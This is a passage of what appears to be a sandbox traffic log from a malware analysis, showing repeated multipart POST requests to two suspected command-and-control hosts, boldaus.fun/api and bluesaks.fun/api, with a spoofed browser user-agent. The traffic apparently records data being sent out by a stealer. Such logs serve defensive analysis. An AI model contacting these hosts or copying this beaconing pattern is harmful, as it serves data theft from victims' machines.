                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:31 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=f9967ajuta4tq6ba5q940slmv1; expires=Sat, 17 Feb 2024 06:35:10 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:31 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Jy%2BYbANGT9FOOrS15W8RIkDJihByJrn0hOJYmqp7YfdTfsHoXUXyUvY1SMdLtG%2FtQRa8sVTgsJNa7MzOOWHRquJJ2b8ZF4pYJxbrIF6KYvCmGZcMsgjfnXTkUpoYm0w%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255a5ce6eb8c6-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 534
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:31 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=iab13o18mbptl4ctg39hoq67h9; expires=Sat, 17 Feb 2024 06:35:10 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:31 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BJ%2BO3BvXTNm9Fsq7KW%2FWGUxzgoi9pmb%2Fdj3vMvJYrUsLwYzLaeCo2pyvVAKQ0utr%2BwuuvyyCRaE33Qkt%2BRJqd2Dp%2FpYN5TMCi8GZRtvuUTlEBcAfeRGGwQ9rbXxVPQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255a67df3664c-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:31 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=mpar3015labu9ukd3ip25cogev; expires=Sat, 17 Feb 2024 06:35:10 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:31 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QxTXHOHsT9RbWq0KlBClXoQ5NXDWBUZpGQM%2FoLJJoUlUP7PAmhd04Q1LgEFTSTUv55WvZY%2FiC1tHYrTCDG2ubhgO6atE9dkNjst1Rd5gp4seejkErnhSp8%2FmdLkwlmI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255a6db86b76c-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 534
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:32 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=emqrt7qh45qqbhtl79oafskh9b; expires=Sat, 17 Feb 2024 06:35:11 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:32 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Jw%2FrMjM4jS60q3RKEjvOIb5Bt20KJAqvTX8KdF777D0aF1w4V6DAK02mnipVLJtNbVjuD6te4Htm6PeVwEiCUwVQ2v60XBkL%2FOO9CIrSZsI8UVawUDOxiwUsowVskw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255a819cd1b02-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:32 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=5h601qa192l31ib4o7pjkqco6m; expires=Sat, 17 Feb 2024 06:35:11 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:32 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SPA%2FbZs4eCJSZkxIy9iteITst9v4Hyut4qSENgEUaxoLGyDfgfqmaYs2liF%2FvTV9zu%2Bv5BV7P0DfijLVBDDVaOblh3NUjyU%2FAG1eKT9okWZjAJEYbbyBhgmNdAm%2F3aw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255a83ba90eb2-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:32 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=n23ltehljojbtl2mh0fsn8ogth; expires=Sat, 17 Feb 2024 06:35:11 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:32 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gMcR%2FmRrsTTF9mmn4erYBWcSlg68G9stmBSC43im0exwKs0BuVnfqAHAd9HT7AAdTjZzijkffbxdOULQIBCRnYzGKCrsvlUk1kXsagE5v64kYsSqW5AkhxsYttxkTdM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255aa39f7b994-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 534
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:32 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=slool5d1h7apqv9c6bhh103jp1; expires=Sat, 17 Feb 2024 06:35:11 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:32 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BC60Ujnu6NqCwncnrdYbfVaE669eQMfl0unSBuXKt1t3igH9bl2OAkVbt5R4Iob9Y%2Bd0jp8orXBm01Hh4sjvPaowL8YGuIBVYC4roQv5VpCk%2Bsw4LURmx46pYvsNiA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255aa384141c2-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:32 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=i2f2ugoqrqaqqa2i87hi4hnq43; expires=Sat, 17 Feb 2024 06:35:11 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:32 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=byh3%2FY%2Fl7FC8RD4JEE%2FiZrVjdtUu4eUpuwApzyOypAIoPp25Gl6k7G5Ve8O3caNWlruPWHZqc1gVbONnUv764BuGedeyXV5runJX%2BWM2yKoGo69CMUUjyVKUOvqaQFU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255abfecb6699-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 534
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:32 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=agrue9jhcd594e8dr7iguun4k3; expires=Sat, 17 Feb 2024 06:35:11 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:32 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5Pqr9%2FLshtBZ1gqWZ5kGkAdxzFjmjEYbzn6h9rbB6QCLOjiZOBW7ek95FIhQZir1mB7wo5lNGjW7W0Fbaovw2tzXOQjUSlJg0GFW19hFeVVpHR1BcDS0U%2Br9FZFtqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255abf90b1caa-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=iancp3gf3psje0m8ol9v6mngcq; expires=Sat, 17 Feb 2024 06:35:11 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:32 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0d56CyzuXTUX6R2ETx6oxz0Elc7V6rvghHhDdQ0NyDssOfvjFr%2Ff%2FR6iTtoYPYyuuvGv%2FJ72oP%2FiONQte%2BkCITkwWJ%2FBfkspxs6pmiQTIEdzU6Uu%2FrT%2B8TvmVwxVulE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255ad3ce60a59-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 534
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=e0fm3ojmsflauphvon539fnqk5; expires=Sat, 17 Feb 2024 06:35:11 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:32 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Y6yEHpsuy915f2s7K4SioEdQ0GKEIIEGGDytarkOxHgq2ENaFQtXfnqP2j0pR9Z6Rq0%2F%2F4PsUIuAa1FiBRI4OWT9ZHEhzciYuirWJr49AppTiNFFYTE5DQm8MoslMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255ad8e0d0a78-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=4lkhtl5ush5q1nmkpldm9a932s; expires=Sat, 17 Feb 2024 06:35:12 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:33 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aBRhZSWutFIG%2FM%2BaiBG2fT9VeRjelrL4uGlsmOfJE7O85bOI5IezusP2vQK4HSbvfZv7%2BZGY2yR0MLyshE0Z8eBMVKhOxmNQhD6z4zNw0ywOqkzDkXJ%2Fg9cDQw%2F1HCI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255af2a8e0a4d-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 534
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=0ob921m01t5ns1eeq8sp4n6gan; expires=Sat, 17 Feb 2024 06:35:12 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:33 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E9b4o9rUK2irJirG5XNuoEVtFZ%2BBYnGLQQDIWcUGCKRqKQgp%2BcAFALeFA7FxorXB4%2FKMkPTeFRn9xEPUWZ8FBisnxLxnRqRcBBJ%2F05ibup7ZKE%2BDbhI3Ce1G%2BuAIiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255af2e120a77-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
